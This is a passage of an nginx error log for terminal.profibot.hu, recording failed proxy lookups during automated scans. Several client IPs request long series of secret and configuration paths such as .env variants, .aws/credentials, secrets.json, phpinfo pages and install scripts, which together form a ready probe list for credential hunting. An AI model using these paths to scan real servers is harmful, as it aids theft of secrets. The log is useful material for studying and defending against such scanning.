"terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/secrets.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.well-known/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.well-known/config.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.well-known/credentials.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /install.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /setup.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /setup-config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /configuration.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /app_dev.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config_dev.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /index-dev.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /index-test.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test/index.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /dev/index.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /dev/config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /maintenance.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /maintenance.html HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /under-construction.html HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /down.html HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.maintenance HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /install/install.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:51 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /setup/setup.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:52 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /setup/index.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:52 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /upgrade.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:52 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /upgrade/index.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:52 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /upgrader.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:52 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /migrate.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:52 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /migration.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:52 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /console.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:52 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /scripts/install.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:52 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /scripts/db.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:52 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /scripts/deploy.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:52 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /env.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:52 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.env.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:52 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /backup.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:52 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /test.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:52 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /debug.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:52 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /logs.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:52 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /deploy.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:52 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /init.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:52 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /install.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:52 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /uninstall.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:52 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /remove.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:52 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /install.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:52 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /update.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:52 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /delete.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:52 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /sample.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:52 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /example.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:52 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /example-config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:52 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /sample-config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 02:38:22 [error] 293#293: *18528 web-terminal could not be resolved (2: Server failure), client: 217.182.64.155, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 02:46:18 [error] 295#295: *18535 web-terminal could not be resolved (2: Server failure), client: 34.214.144.136, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 02:46:18 [error] 295#295: *18535 web-terminal could not be resolved (2: Server failure), client: 34.214.144.136, server: terminal.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "terminal.profibot.hu", referrer: "https://terminal.profibot.hu/" +2026/01/28 02:46:22 [error] 295#295: *18537 web-terminal could not be resolved (2: Server failure), client: 34.214.144.136, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 02:46:22 [error] 295#295: *18537 web-terminal could not be resolved (2: Server failure), client: 34.214.144.136, server: terminal.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "terminal.profibot.hu", referrer: "https://terminal.profibot.hu/" +2026/01/28 03:01:21 [error] 295#295: *18546 web-terminal could not be resolved (2: Server failure), client: 23.27.145.27, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 03:05:27 [warn] 295#295: *18548 using uninitialized "server" variable while logging request, client: 181.214.218.190, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 03:07:11 [error] 295#295: *18570 web-terminal could not be resolved (2: Server failure), client: 34.143.138.199, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 03:07:12 [error] 295#295: *18570 web-terminal could not be resolved (2: Server failure), client: 34.143.138.199, server: terminal.profibot.hu, request: "GET /wordpress/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 04:01:48 [error] 294#294: *20094 web-terminal could not be resolved (2: Server failure), client: 195.178.110.132, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 05:07:07 [error] 301#301: *21612 web-terminal could not be resolved (2: Server failure), client: 149.57.180.35, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 06:49:48 [error] 301#301: *24738 web-terminal could not be resolved (2: Server failure), client: 84.1.26.27, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 06:49:48 [error] 301#301: *24738 web-terminal could not be resolved (2: Server failure), client: 84.1.26.27, server: terminal.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "terminal.profibot.hu", referrer: "https://terminal.profibot.hu/" +2026/01/28 07:41:58 [error] 302#302: *24801 web-terminal could not be resolved (2: Server failure), client: 84.254.106.197, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 07:41:58 [error] 302#302: *24801 web-terminal could not be resolved (2: Server failure), client: 84.254.106.197, server: terminal.profibot.hu, request: "GET /js/lkk_ch.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 07:41:58 [error] 302#302: *24801 web-terminal could not be resolved (2: Server failure), client: 84.254.106.197, server: terminal.profibot.hu, request: "GET /css/support_parent.css HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 07:41:58 [error] 302#302: *24801 web-terminal could not be resolved (2: Server failure), client: 84.254.106.197, server: terminal.profibot.hu, request: "GET /js/twint_ch.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 10:01:08 [error] 300#300: *26406 web-terminal could not be resolved (2: Server failure), client: 52.192.123.92, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 10:01:08 [error] 300#300: *26406 web-terminal could not be resolved (2: Server failure), client: 52.192.123.92, server: terminal.profibot.hu, request: "HEAD /apps HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 10:01:09 [error] 300#300: *26406 web-terminal could not be resolved (2: Server failure), client: 52.192.123.92, server: terminal.profibot.hu, request: "POST /apps HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 12:26:38 [error] 307#307: *29454 web-terminal could not be resolved (2: Server failure), client: 84.254.106.197, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 12:26:38 [error] 307#307: *29454 web-terminal could not be resolved (2: Server failure), client: 84.254.106.197, server: terminal.profibot.hu, request: "GET /css/support_parent.css HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 12:26:38 [error] 307#307: *29454 web-terminal could not be resolved (2: Server failure), client: 84.254.106.197, server: terminal.profibot.hu, request: "GET /js/twint_ch.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 12:26:38 [error] 307#307: *29454 web-terminal could not be resolved (2: Server failure), client: 84.254.106.197, server: terminal.profibot.hu, request: "GET /js/lkk_ch.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 12:53:56 [error] 307#307: *29463 web-terminal could not be resolved (2: Server failure), client: 66.132.153.137, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 13:59:33 [error] 308#308: *29540 web-terminal could not be resolved (2: Server failure), client: 35.192.138.69, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu", referrer: "http://terminal.profibot.hu" +2026/01/28 14:23:38 [error] 308#308: *29550 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET / HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:38 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /info.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:38 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /php-info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:38 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /newinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:38 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /siteinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:38 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /info.php.1 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:38 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /admin/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:38 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /pageinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:38 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /info.php.back HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:38 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpbb/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:38 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /release_info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:38 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test/info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:38 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /info HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:38 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:38 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfo.php3 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:38 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfo.php.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /info.php.save.1 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /info.php_ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /_info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /admin_phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /dbinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /admin_info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.aws/credentials HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfo.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /admin/admin_phpinfo.php4 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /pinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.backup HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env_sample HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.old HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.www HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.docker/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.dev HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.example HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env_1 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.stage HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.pam_environment HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.environment HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.production HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.production.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /env.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.powenv HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.rbenv-gemsets HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.envs HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.docker HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.sample HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env_bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.development.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:39 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env-example HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.prod HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.docker.dev HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.test HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /env.list HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.ghc.environment HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /env.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /printenv HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.hsenv HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /environment HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /env.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /envrc HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.env.dev.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /environment.ts HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:40 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET 